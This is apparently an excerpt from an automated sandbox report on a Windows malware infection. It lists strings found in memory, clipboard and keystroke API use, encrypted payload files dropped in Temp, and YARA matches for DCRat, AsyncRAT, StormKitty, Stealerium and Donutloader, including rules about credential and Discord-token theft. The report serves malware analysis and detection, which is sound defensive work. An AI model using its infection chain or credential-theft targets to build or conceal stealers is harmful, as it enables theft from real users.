                  Source: curcuma.exe, 00000024.00000003.2404805159.000002428F06A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA13Q6AL.img
                  Source: curcuma.exe, 00000024.00000003.2404629202.000002428F06B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA13Q6AL.imgt
                  Source: curcuma.exe, 00000024.00000003.2401155848.000002428EFE2000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000024.00000003.2404629202.000002428F06B000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000024.00000003.2404805159.000002428F06A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA1u24yb.img
                  Source: curcuma.exe, 00000024.00000003.2403687246.000002428EFEB000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000024.00000003.2404629202.000002428F06B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA1u24yb.imgt
                  Source: curcuma.exe, 00000024.00000003.2403687246.000002428EFEB000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000024.00000003.2404629202.000002428F06B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA1xc9H0.img
                  Source: curcuma.exe, 00000024.00000003.2403687246.000002428EFEB000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000024.00000003.2404629202.000002428F06B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA1xc9H0.imgt
                  Source: curcuma.exe, 00000024.00000003.2401155848.000002428EFE2000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000024.00000003.2404629202.000002428F06B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAc9vHK.img
                  Source: curcuma.exe, 00000024.00000003.2403687246.000002428EFEB000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000024.00000003.2404629202.000002428F06B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAc9vHK.imgt
                  Source: curcuma.exe, 00000024.00000003.2398313807.000002428EFE2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAdTRDX.img
                  Source: curcuma.exe, 00000024.00000003.2404805159.000002428F06A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAdTRDX.imgt
                  Source: curcuma.exe, 00000024.00000003.2401155848.000002428EFE2000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000024.00000003.2404629202.000002428F06B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1lFz6G.img
                  Source: curcuma.exe, 00000024.00000003.2403687246.000002428EFEB000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000024.00000003.2404629202.000002428F06B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1lFz6G.imgt
                  Source: curcuma.exe, 00000024.00000003.2404629202.000002428F06B000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000024.00000003.2404805159.000002428F06A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1msKSh.img
                  Source: curcuma.exe, 00000024.00000003.2422328488.000002428EFE2000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000024.00000003.2417754835.000002428EFE2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://img.s-msn.com/tenant/amp/entityid/AA1tU84U
                  Source: curcuma.exe, 00000024.00000003.2417754835.000002428EFE2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://img.s-msn.com/tenant/amp/entityid/AA1tU84Ux-source-length:80205content-length:80205cache-con
                  Source: curcuma.exe, 00000024.00000003.2422328488.000002428EFE2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://img.s-msn.com/tenant/amp/entityid/BB1msOZa
                  Source: curcuma.exe, 00000024.00000003.2307412951.000002428F04B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/
                  Source: curcuma.exe, 00000024.00000003.2307412951.000002428F04B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/Char
                  Source: curcuma.exe, 00000024.00000003.2307412951.000002428F04B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/Chart
                  Source: curcuma.exe, 00000024.00000003.2419008052.0000024292DCB000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000024.00000003.2401955377.0000024292DCB000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000024.00000003.2345352912.000002428F068000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000024.00000003.2308515239.000002428F04B000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000024.00000003.2369488163.000002428F04B000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000024.00000003.2321094941.000002428F04B000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000024.00000003.2357236044.000002428F04B000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000024.00000003.2333644311.000002428F04B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.microsoftonline.com/
                  Source: curcuma.exe, 00000024.00000003.2333644311.000002428F04B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://msn.com
                  Source: curcuma.exe, 00000024.00000003.2307412951.000002428F04B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://nextdns.io/privacy
                  Source: curcuma.exe, 00000024.00000003.2307412951.000002428F04B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://nextdns.io/privacyr
                  Source: curcuma.exe, 00000024.00000003.2398313807.000002428EFE2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ntp.msn.
                  Source: curcuma.exe, 00000024.00000003.2419008052.0000024292DCB000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000024.00000003.2459483437.000002428F003000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000024.00000003.2401955377.0000024292DCB000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000024.00000003.2444632892.000002428F003000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000024.00000003.2433987605.000002428F003000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000024.00000003.2419214319.000002428EFE2000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000024.00000003.2421271796.000002428F084000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000024.00000003.2357444651.000002428F04B000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000024.00000003.2422225655.000002428F06B000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000024.00000003.2418196116.000002428F06B000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000024.00000003.2459995322.000002428F010000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000024.00000003.2345352912.000002428F068000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000024.00000003.2400479319.000002428EFE2000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000024.00000003.2452794519.000002428F003000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000024.00000003.2308515239.000002428F04B000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000024.00000003.2321094941.000002428F04B000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000024.00000003.2453381040.000002428F010000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000024.00000003.2402156077.000002428EFE2000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000024.00000003.2440623982.000002428F010000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 
00000024.00000003.2386235587.000002428EFE2000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000024.00000002.2521090954.000002428F011000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ntp.msn.com
                  Source: curcuma.exe, 00000024.00000003.2417754835.000002428EFE2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ntp.msn.com/
                  Source: curcuma.exe, 00000024.00000003.2386235587.000002428EFE2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ntp.msn.com/a9
                  Source: curcuma.exe, 00000024.00000003.2401955377.0000024292DCB000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000024.00000003.2345352912.000002428F068000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000024.00000003.2308515239.000002428F04B000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000024.00000003.2369488163.000002428F04B000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000024.00000003.2321094941.000002428F04B000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000024.00000003.2357236044.000002428F04B000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000024.00000003.2294930864.000002428F064000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000024.00000003.2333644311.000002428F04B000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://ntp.msn.com/bundles/v1/edgeChromium/latest/SSR-extension.867cdfd625d830718faf.js
                  Source: curcuma.exe, 00000024.00000003.2295960639.000002428F04B000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://ntp.msn.com/bundles/v1/edgeChromium/latest/web-worker.948ffa5ea2d441a35f55.js#lang=en-us&ads
                  Source: curcuma.exe, 00000024.00000003.2294930864.000002428F064000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000024.00000003.2333644311.000002428F04B000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://ntp.msn.com/edge/ntp?locale=en-GB&title=New%20tab&dsp=1&sp=Bing&isFREModalBackground=1&start
                  Source: curcuma.exe, 00000024.00000003.2385582270.000002428F06B000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000024.00000003.2369710156.000002428F04B000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://ntp.msn.com/hi
                  Source: curcuma.exe, 00000024.00000003.2415670214.000002428EFE2000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://ntp.msn.comreport-to
                  Source: curcuma.exe, 00000024.00000003.2459483437.000002428F003000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000024.00000003.2444632892.000002428F003000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000024.00000003.2433987605.000002428F003000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000024.00000003.2459995322.000002428F010000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000024.00000003.2452794519.000002428F003000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000024.00000003.2453381040.000002428F010000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000024.00000003.2440623982.000002428F010000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000024.00000002.2521090954.000002428F011000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://ntp.msn.comreport-to:
                  Source: curcuma.exe, 00000024.00000003.2307412951.000002428F04B000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://odvr.nic.cz/doh
                  Source: curcuma.exe, 00000024.00000003.2319603939.000002428F065000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://pst-issuer.hcaptcha.com
                  Source: curcuma.exe, 00000024.00000003.2307412951.000002428F04B000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://public.dns.iij.jp/
                  Source: curcuma.exe, 00000024.00000003.2307412951.000002428F04B000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://public.dns.iij.jp/r
                  Source: curcuma.exe, 00000024.00000003.2418196116.000002428F06B000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://sb.scorecardresearch.com/b2?rn=1741365293756&c1=2&c2=3000001&cs_ucfr=1&c7=https%3A%2F%2Fntp.
                  Source: curcuma.exe, 00000024.00000003.2385727598.000002428EFE2000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://sb.scorecardresearch.com/b?rn=1741365293756&c1=2&c2=3000001&cs_ucfr=1&c7=https%3A%2F%2Fntp.m
                  Source: RegAsm.exe, 0000001E.00000002.2513996605.0000000001302000.00000040.00000400.00020000.00000000.sdmp | String found in binary or memory: https://stackoverflow.com/q/11564914/23354;
                  Source: RegAsm.exe, 0000001E.00000002.2513996605.0000000001302000.00000040.00000400.00020000.00000000.sdmp | String found in binary or memory: https://stackoverflow.com/q/14436606/23354cIt
                  Source: RegAsm.exe, 0000001E.00000002.2513996605.0000000001302000.00000040.00000400.00020000.00000000.sdmp | String found in binary or memory: https://stackoverflow.com/q/2152978/23354
                  Source: curcuma.exe, 00000024.00000003.2419008052.0000024292DCB000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://tp.msn.
                  Source: curcuma.exe, 00000024.00000003.2319603939.000002428F065000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://trusttoken.dev
                  Source: RegAsm.exe, 0000001E.00000002.2513996605.0000000001302000.00000040.00000400.00020000.00000000.sdmp | String found in binary or memory: https://urn.to/r/sds_see
                  Source: RegAsm.exe, 0000001E.00000002.2513996605.0000000001302000.00000040.00000400.00020000.00000000.sdmp | String found in binary or memory: https://urn.to/r/sds_seeaCould
                  Source: Seat.com, 00000013.00000003.1371153350.000000000460A000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.autoitscript.com/autoit3/
                  Source: curcuma.exe, 00000024.00000003.2383601149.000002428F06B000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000024.00000003.2320033823.000002428F04B000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.cisco.com/c/en/us/about/legal/privacy-full.html
                  Source: curcuma.exe, 00000024.00000003.2420129542.000002428EFE2000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.clarity.ms
                  Source: Seat.com, 00000013.00000003.1371153350.000000000460A000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.globalsign.com/repository/0
                  Source: curcuma.exe, 00000024.00000003.2205440376.000002428F047000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_alldp.ico
                  Source: curcuma.exe, 00000024.00000003.2307412951.000002428F04B000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.nic.cz/odvr/
                  Source: curcuma.exe, 00000024.00000003.2307412951.000002428F04B000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.nic.cz/odvr/har
                  Source: unknown | HTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.6:62055 version: TLS 1.2
                  Source: unknown | HTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.6:62056 version: TLS 1.2
                  Source: unknown | HTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.6:62057 version: TLS 1.2
                  Source: unknown | HTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.6:62184 version: TLS 1.2

                  Key, Mouse, Clipboard, Microphone and Screen Capturing

                  Source: Yara match | File source: 30.2.RegAsm.exe.1300000.1.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 30.2.RegAsm.exe.1425afa.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 0000001E.00000002.2513996605.0000000001302000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: Process Memory Space: RegAsm.exe PID: 8140, type: MEMORYSTR
                  Source: C:\Users\user\Desktop\ADFoyxP.exe | Code function: 0_2_004050CD GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard, 0_2_004050CD
                  Source: C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.com | Code function: 27_2_003DF7C7 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard, 27_2_003DF7C7
                  Source: C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.com | Code function: 27_2_003DF55C OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard, 27_2_003DF55C
                  Source: C:\Users\user\Desktop\ADFoyxP.exe | Code function: 0_2_004044A5 GetDlgItem,GetDlgItem,IsDlgButtonChecked,GetDlgItem,GetAsyncKeyState,GetDlgItem,ShowWindow,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW, 0_2_004044A5
                  Source: C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.com | Code function: 27_2_003F9FD2 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW, 27_2_003F9FD2

                  Spam, unwanted Advertisements and Ransom Demands

                  Source: C:\Users\user\Desktop\ADFoyxP.exe | File created: C:\Users\user\AppData\Local\Temp\Argentina.pub entropy: 7.99765353495
                  Source: C:\Users\user\Desktop\ADFoyxP.exe | File created: C:\Users\user\AppData\Local\Temp\Distinguished.pub entropy: 7.99809266375
                  Source: C:\Users\user\Desktop\ADFoyxP.exe | File created: C:\Users\user\AppData\Local\Temp\Poem.pub entropy: 7.99733876431
                  Source: C:\Users\user\Desktop\ADFoyxP.exe | File created: C:\Users\user\AppData\Local\Temp\Governor.pub entropy: 7.99796220639
                  Source: C:\Users\user\Desktop\ADFoyxP.exe | File created: C:\Users\user\AppData\Local\Temp\Swingers.pub entropy: 7.99812528823
                  Source: C:\Users\user\Desktop\ADFoyxP.exe | File created: C:\Users\user\AppData\Local\Temp\Legislation.pub entropy: 7.99786443988
                  Source: C:\Users\user\Desktop\ADFoyxP.exe | File created: C:\Users\user\AppData\Local\Temp\Explicitly.pub entropy: 7.99686467774
                  Source: C:\Users\user\Desktop\ADFoyxP.exe | File created: C:\Users\user\AppData\Local\Temp\Comparison.pub entropy: 7.99674290091
                  Source: C:\Users\user\Desktop\ADFoyxP.exe | File created: C:\Users\user\AppData\Local\Temp\Enlarge.pub entropy: 7.99778287234
                  Source: C:\Users\user\Desktop\ADFoyxP.exe | File created: C:\Users\user\AppData\Local\Temp\Listening.pub entropy: 7.99720925196
                  Source: C:\Users\user\Desktop\ADFoyxP.exe | File created: C:\Users\user\AppData\Local\Temp\Gate.pub entropy: 7.9966611885
                  Source: C:\Users\user\Desktop\ADFoyxP.exe | File created: C:\Users\user\AppData\Local\Temp\Preference.pub entropy: 7.99684640346
                  Source: C:\Users\user\Desktop\ADFoyxP.exe | File created: C:\Users\user\AppData\Local\Temp\Apartments.pub entropy: 7.99764085482
                  Source: C:\Users\user\Desktop\ADFoyxP.exe | File created: C:\Users\user\AppData\Local\Temp\Republican.pub entropy: 7.99632178366
                  Source: C:\Users\user\Desktop\ADFoyxP.exe | File created: C:\Users\user\AppData\Local\Temp\Amenities.pub entropy: 7.99702026084
                  Source: C:\Users\user\Desktop\ADFoyxP.exe | File created: C:\Users\user\AppData\Local\Temp\Worcester.pub entropy: 7.99796554729
                  Source: C:\Users\user\Desktop\ADFoyxP.exe | File created: C:\Users\user\AppData\Local\Temp\Generating.pub entropy: 7.99807030539
                  Source: C:\Users\user\Desktop\ADFoyxP.exe | File created: C:\Users\user\AppData\Local\Temp\Regulation.pub entropy: 7.99630322854
                  Source: C:\Users\user\Desktop\ADFoyxP.exe | File created: C:\Users\user\AppData\Local\Temp\Performing.pub entropy: 7.99750792054
                  Source: C:\Users\user\Desktop\ADFoyxP.exe | File created: C:\Users\user\AppData\Local\Temp\Robert.pub entropy: 7.99725695551
                  Source: C:\Users\user\Desktop\ADFoyxP.exe | File created: C:\Users\user\AppData\Local\Temp\Maintains.pub entropy: 7.99814457245
                  Source: C:\Users\user\Desktop\ADFoyxP.exe | File created: C:\Users\user\AppData\Local\Temp\Document.pub entropy: 7.99688077856
                  Source: C:\Users\user\Desktop\ADFoyxP.exe | File created: C:\Users\user\AppData\Local\Temp\Confusion.pub entropy: 7.99759203123
                  Source: C:\Users\user\Desktop\ADFoyxP.exe | File created: C:\Users\user\AppData\Local\Temp\Reverse.pub entropy: 7.99813463449
                  Source: C:\Users\user\Desktop\ADFoyxP.exe | File created: C:\Users\user\AppData\Local\Temp\Vacation.pub entropy: 7.99753681116
                  Source: C:\Users\user\Desktop\ADFoyxP.exe | File created: C:\Users\user\AppData\Local\Temp\Vampire.pub entropy: 7.99666754967
                  Source: C:\Users\user\Desktop\ADFoyxP.exe | File created: C:\Users\user\AppData\Local\Temp\Blood.pub entropy: 7.99804267671
                  Source: C:\Users\user\Desktop\ADFoyxP.exe | File created: C:\Users\user\AppData\Local\Temp\Hell.pub entropy: 7.99698268184
                  Source: C:\Users\user\Desktop\ADFoyxP.exe | File created: C:\Users\user\AppData\Local\Temp\Breaks.pub entropy: 7.99810429407
                  Source: C:\Users\user\Desktop\ADFoyxP.exe | File created: C:\Users\user\AppData\Local\Temp\Concept.pub entropy: 7.99720276963
                  Source: C:\Users\user\Desktop\ADFoyxP.exe | File created: C:\Users\user\AppData\Local\Temp\Really.pub entropy: 7.99835078472
                  Source: C:\Users\user\Desktop\ADFoyxP.exe | File created: C:\Users\user\AppData\Local\Temp\Urban.pub entropy: 7.99778737709
                  Source: C:\Users\user\Desktop\ADFoyxP.exe | File created: C:\Users\user\AppData\Local\Temp\Trademarks.pub entropy: 7.99757414761
                  Source: C:\Users\user\Desktop\ADFoyxP.exe | File created: C:\Users\user\AppData\Local\Temp\Thousand.pub entropy: 7.99729046263
                  Source: C:\Users\user\Desktop\ADFoyxP.exe | File created: C:\Users\user\AppData\Local\Temp\Silly.pub entropy: 7.99829492948
                  Source: C:\Users\user\Desktop\ADFoyxP.exe | File created: C:\Users\user\AppData\Local\Temp\Both.pub entropy: 7.99806131353
                  Source: C:\Users\user\Desktop\ADFoyxP.exe | File created: C:\Users\user\AppData\Local\Temp\Bull.pub entropy: 7.99770447322
                  Source: C:\Windows\SysWOW64\cmd.exe | File created: C:\Users\user\AppData\Local\Temp\353090\m entropy: 7.99992399201
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.com | File created: C:\Users\user\AppData\Local\TradeSecure Innovations\F entropy: 7.99992399201
                  Source: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe | File created: C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506 entropy: 7.99602810784

                  System Summary

                  Source: 30.2.RegAsm.exe.1300000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_DCRat_1aeea1ac Author: unknown
                  Source: 30.2.RegAsm.exe.1300000.1.unpack, type: UNPACKEDPEMatched rule: Detects Stealerium based on specific strings Author: Sekoia.io
                  Source: 30.2.RegAsm.exe.1300000.1.unpack, type: UNPACKEDPEMatched rule: Finds StormKitty samples (or their variants) based on specific strings Author: Sekoia.io
                  Source: 30.2.RegAsm.exe.1300000.1.unpack, type: UNPACKEDPEMatched rule: Find DcRAT samples (qwqdanchun) based on specific strings Author: Sekoia.io
                  Source: 30.2.RegAsm.exe.1300000.1.unpack, type: UNPACKEDPEMatched rule: Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc. Author: ditekSHen
                  Source: 30.2.RegAsm.exe.1300000.1.unpack, type: UNPACKEDPEMatched rule: Detects executables attemping to enumerate video devices using WMI Author: ditekSHen
                  Source: 30.2.RegAsm.exe.1300000.1.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Discord tokens regular expressions Author: ditekSHen
                  Source: 30.2.RegAsm.exe.1300000.1.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing many VPN software clients. Observed in infosteslers Author: ditekSHen
                  Source: 30.2.RegAsm.exe.1300000.1.unpack, type: UNPACKEDPE | Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                  Source: 30.2.RegAsm.exe.1300000.1.unpack, type: UNPACKEDPE | Matched rule: Detects StormKitty infostealer Author: ditekSHen
                  Source: 30.2.RegAsm.exe.1300000.1.unpack, type: UNPACKEDPE | Matched rule: Detects AsyncRAT Author: ditekSHen
                  Source: 30.2.RegAsm.exe.1425afa.0.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_DCRat_1aeea1ac Author: unknown
                  Source: 30.2.RegAsm.exe.1425afa.0.raw.unpack, type: UNPACKEDPE | Matched rule: Detects Stealerium based on specific strings Author: Sekoia.io
                  Source: 30.2.RegAsm.exe.1425afa.0.raw.unpack, type: UNPACKEDPE | Matched rule: Finds StormKitty samples (or their variants) based on specific strings Author: Sekoia.io
                  Source: 30.2.RegAsm.exe.1425afa.0.raw.unpack, type: UNPACKEDPE | Matched rule: Find DcRAT samples (qwqdanchun) based on specific strings Author: Sekoia.io
                  Source: 30.2.RegAsm.exe.1425afa.0.raw.unpack, type: UNPACKEDPE | Matched rule: Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc. Author: ditekSHen
                  Source: 30.2.RegAsm.exe.1425afa.0.raw.unpack, type: UNPACKEDPE | Matched rule: Detects executables attemping to enumerate video devices using WMI Author: ditekSHen
                  Source: 30.2.RegAsm.exe.1425afa.0.raw.unpack, type: UNPACKEDPE | Matched rule: Detects executables referencing Discord tokens regular expressions Author: ditekSHen
                  Source: 30.2.RegAsm.exe.1425afa.0.raw.unpack, type: UNPACKEDPE | Matched rule: Detects executables referencing many VPN software clients. Observed in infosteslers Author: ditekSHen
                  Source: 30.2.RegAsm.exe.1425afa.0.raw.unpack, type: UNPACKEDPE | Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                  Source: 30.2.RegAsm.exe.1425afa.0.raw.unpack, type: UNPACKEDPE | Matched rule: Detects AsyncRAT Author: ditekSHen
                  Source: 00000024.00000002.2543057851.00007FF7C7371000.00000004.00000001.01000000.0000000C.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
                  Source: 00000025.00000002.2542566206.000001FD691D0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
                  Source: 0000001E.00000002.2513996605.0000000001302000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_DCRat_1aeea1ac Author: unknown
                  Source: 0000001E.00000002.2513996605.0000000001302000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: Detects executables referencing Discord tokens regular expressions Author: ditekSHen
                  Source: 0000001E.00000002.2513996605.0000000001302000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: Detects AsyncRAT Author: ditekSHen
                  Source: Process Memory Space: RegAsm.exe PID: 8140, type: MEMORYSTR | Matched rule: Detects executables referencing Discord tokens regular expressions Author: ditekSHen
                  Source: Process Memory Space: RegAsm.exe PID: 8140, type: MEMORYSTR | Matched rule: Detects AsyncRAT Author: ditekSHen
                  Source: C:\Windows\System32\wscript.exe | COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}
                  Source: unknown | Process created: C:\Windows\System32\wscript.exe C:\Windows\system32\wscript.EXE //B "C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.js"
                  Source: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe | Code function: 30_2_01817160 NtProtectVirtualMemory
                  Source: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe | Code function: 30_2_01816D08 NtProtectVirtualMemory
